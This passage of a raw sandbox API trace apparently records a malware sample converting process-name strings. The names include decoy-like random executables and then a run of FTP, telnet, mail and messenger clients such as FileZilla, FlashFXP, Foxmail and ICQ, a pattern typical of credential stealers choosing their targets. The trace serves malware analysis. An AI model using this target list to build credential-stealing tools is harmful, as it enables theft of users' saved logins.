(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="sppsvc.exeeeoRun.exe㚐£↠¦") returned 10 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 12 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="iexplore.exeoRun.exe㚐£↠¦") returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 12 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="iexplore.exeoRun.exe㚐£↠¦") returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sufferexistrich.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sufferexistrich.exe", cchWideChar=19, lpMultiByteStr=0xa11f0c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sufferexistrich.exe", lpUsedDefaultChar=0x0) returned 19 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=19, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="sufferexistrich.exee㚐£↠¦") returned 19 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="have return physical.exe", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="have return physical.exe", cchWideChar=24, lpMultiByteStr=0xa11f0c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="have return physical.exe", lpUsedDefaultChar=0x0) returned 24 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=24, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="have return physical.exe") returned 24 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="or level.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="or level.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="or level.exe", lpUsedDefaultChar=0x0) returned 12 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="or level.exephysical.exe") returned 12 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="court camera.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="court camera.exe", cchWideChar=16, lpMultiByteStr=0xa11f0c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="court camera.exe", lpUsedDefaultChar=0x0) returned 16 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=16, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="court camera.exeical.exe") returned 16 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="or-finger.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="or-finger.exe", cchWideChar=13, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="or-finger.exe", lpUsedDefaultChar=0x0) returned 13 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="or-finger.exeexeical.exe") returned 13 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="travel imagine recently.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="travel imagine recently.exe", cchWideChar=27, lpMultiByteStr=0xa11f0c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="travel imagine recently.exe", lpUsedDefaultChar=0x0) returned 27 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=27, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="travel imagine recently.exe£lj") returned 27 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="school_for.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="school_for.exe", cchWideChar=14, lpMultiByteStr=0xa11f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="school_for.exe", lpUsedDefaultChar=0x0) returned 14 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=14, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="school_for.exe recently.exe£lj") returned 14 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="whosefirmthe.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="whosefirmthe.exe", cchWideChar=16, lpMultiByteStr=0xa11f0c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whosefirmthe.exe", lpUsedDefaultChar=0x0) returned 16 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=16, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="whosefirmthe.exeecently.exe£lj") returned 16 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="seat_raise_join.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="seat_raise_join.exe", cchWideChar=19, lpMultiByteStr=0xa11f0c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="seat_raise_join.exe", lpUsedDefaultChar=0x0) returned 19 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=19, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="seat_raise_join.exently.exe£lj") returned 19 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="formerbuildpresent.exe", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="formerbuildpresent.exe", cchWideChar=22, lpMultiByteStr=0xa11f0c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="formerbuildpresent.exe", lpUsedDefaultChar=0x0) returned 22 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=22, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="formerbuildpresent.exey.exe£lj") returned 22 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="unittype.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="unittype.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unittype.exe", lpUsedDefaultChar=0x0) returned 12 [0287.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="unittype.exeresent.exey.exe£lj") returned 12 [0287.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="allow.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="allow.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="allow.exe", lpUsedDefaultChar=0x0) returned 9 [0288.949] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="allow.exeexeresent.exey.exe£lj") returned 9 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="rate.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="rate.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rate.exe", lpUsedDefaultChar=0x0) returned 8 [0288.949] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="rate.exeeexeresent.exey.exe£lj") returned 8 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="pushweight.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="pushweight.exe", cchWideChar=14, lpMultiByteStr=0xa11f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pushweight.exe", lpUsedDefaultChar=0x0) returned 14 [0288.949] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=14, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="pushweight.exesent.exey.exe£lj") returned 14 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="film.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="film.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="film.exe", lpUsedDefaultChar=0x0) returned 8 [0288.949] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="film.exeht.exesent.exey.exe£lj") returned 8 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="dead.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="dead.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dead.exe", lpUsedDefaultChar=0x0) returned 8 [0288.949] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="dead.exeht.exesent.exey.exe£lj") returned 8 [0288.949] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="than.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="than.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="than.exe", lpUsedDefaultChar=0x0) returned 8 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="than.exeht.exesent.exey.exe£lj") returned 8 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="feel.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="feel.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feel.exe", lpUsedDefaultChar=0x0) returned 8 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="feel.exeht.exesent.exey.exe£lj") returned 8 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3dftp.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3dftp.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 9 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="3dftp.exet.exesent.exey.exe£lj") returned 9 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="absolutetelnet.exe", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="absolutetelnet.exe", cchWideChar=18, lpMultiByteStr=0xa11f0c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 18 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=18, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="absolutetelnet.exe.exey.exe£lj") returned 18 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="alftp.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="alftp.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 9 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="alftp.exeelnet.exe.exey.exe£lj") returned 9 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="barca.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="barca.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 9 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="barca.exeelnet.exe.exey.exe£lj") returned 9 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bitkinex.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="bitkinex.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 12 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="bitkinex.exeet.exe.exey.exe£lj") returned 12 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="coreftp.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="coreftp.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 11 [0288.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="coreftp.exeeet.exe.exey.exe£lj") returned 11 [0288.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="far.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="far.exe", cchWideChar=7, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 7 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="far.exe.exeeet.exe.exey.exe£lj") returned 7 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="filezilla.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="filezilla.exe", cchWideChar=13, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 13 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="filezilla.exet.exe.exey.exe£lj") returned 13 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="flashfxp.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="flashfxp.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 12 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="flashfxp.exeet.exe.exey.exe£lj") returned 12 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="fling.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="fling.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 9 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="fling.exeexeet.exe.exey.exe£lj") returned 9 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="foxmailincmail.exe", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="foxmailincmail.exe", cchWideChar=18, lpMultiByteStr=0xa11f0c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 18 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=18, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="foxmailincmail.exe.exey.exe£lj") returned 18 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=20, lpMultiByteStr=0xa11f0c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 20 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=20, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="gmailnotifierpro.exexey.exe£lj") returned 20 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="icq.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="icq.exe", cchWideChar=7, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 7 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: 